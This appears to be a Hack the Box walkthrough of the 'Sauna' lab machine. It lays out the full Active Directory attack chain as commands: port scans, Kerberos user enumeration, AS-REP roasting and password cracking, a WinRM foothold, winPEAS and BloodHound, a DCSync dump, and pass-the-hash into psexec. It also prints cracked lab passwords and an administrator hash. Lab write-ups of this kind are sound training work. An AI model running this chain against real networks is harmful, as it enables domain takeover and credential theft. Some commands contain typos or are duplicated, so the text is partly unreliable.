Skip to content

Latest commit

 

History

History
272 lines (225 loc) · 8.84 KB

sauna.md

File metadata and controls

272 lines (225 loc) · 8.84 KB
Raw

Hack the Box - Sauna

Machine IP: 10.10.10.175 - Windows

Add to DNS

10.10.10.175    egotistical-bank.local sauna sauna.egotistical-bank.local

Nmap

TCP All Ports

▶ nmap -Pn -sS -p- 10.10.10.175 -T4 --min-rate 1000 -oN surface.nmap

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 09:39 IST
Nmap scan report for 10.10.10.175
Host is up (0.18s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49695/tcp open  unknown
49720/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 124.54 seconds

Open TCP Ports Service Version and Default Scripts

▶ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49695,49720 10.10.10.175 -oN deep.nmap

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 09:26 IST
Nmap scan report for 10.10.10.175
Host is up (0.18s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-15 10:56:16Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m41s
| smb2-time: 
|   date: 2023-04-15T10:57:10
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.84 seconds

image

HTTP

Home

image

Users

image

Fergus Smith
Shuan Coins
Sophie Driver
Bowie Taylor
Hugo Bear
Steven Kerb

LDAPSearch

Base DN (Distinguished Name)

▶ ldapsearch -H ldap://10.10.10.175 -x -s base namingcontexts

image

Subtree Attributes

▶ ldapsearch -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -s sub

image

Kerberos

Kerberos Authentication Attack

  • Identify valid users.
  • Create a wordlist of potential usernames using the names found earlier.

Validate Usernames

▶ kerbrute userenum --dc 10.10.10.175 -d egotistical-bank.local users.txt

image

administrator@egotistical-bank.local
fsmith@egotistical-bank.local

AS-REP Roasting

  • Find users who have Kerberos preauthentication disabled and get their TGT.
▶ kerbrute userenum --dc 10.10.10.175 -d egotistical-bank.local users.txt

image

Crack TGT

  • Crack the TGT obtained for user fsmith to get the password.
▶ john --format:krb5asrep ticket.hrb5 --wordlist=/usr/share/wordlists/rockyou.txt

image

fsmith:Thestrokes23

SMB

Enumerate SMB Shares

  • Enumerate the shares available, which are shared directories or resources that can be accessed.
▶ crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23 --shares

image

WINRM

Login

  • Check for Windows Remote Management login using the found credentials.
▶ crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23

image

Foothold

  • Login as user fsmith.
▶ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

image

Privilege Escalation

WinPEAS

  • Upload winPEASx64.exe to "Sauna".
  • Execute
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload winPEASx64.exe

image image

WinPEAS Output

image

  • Credentials: svc_loanmanager:Moneymakestheworldgoround!

BloodHound

  • Start neo4j as root.
▶ neoj4 console
  • Start bloodhound.
▶ BloodHound --no-sandbox
  • Upload SharpHound.exe.
  • Launch SharpHound.exe.
▶ upload `SharpHound.exe`

image image

  • Download data
*Evil-WinRM* PS C:\Users\FSmith\Documents> download 20230416073219_BloodHound.zip

image image

  • Upload zip to BloodHound. image

  • Mark owned users FSMITH@EGOTISTICAL-BANK.LOCAL and SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL. image

  • Find Pricipals with DCSync Rights image image image

DCSync Attack - Impacket

▶ impacket-secretsdump egotistical-bank.local/svc_loanmgr@10.10.10.175
  • Password: Found earlier Moneymakestheworldgoround!. image

Pass the Hash Attack

▶ crackmapexec smb 10.10.10.175 -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e

image

  • User the NTLM hash twice instead of using "LANMAN:NTLM".
▶ impacket-psexec egotistical-bank.local/administrator@10.10.10.175 -hashes 823452073d75b9d1cf70ebdf86c7f98e:823452073d75b9d1cf70ebdf86c7f98e

image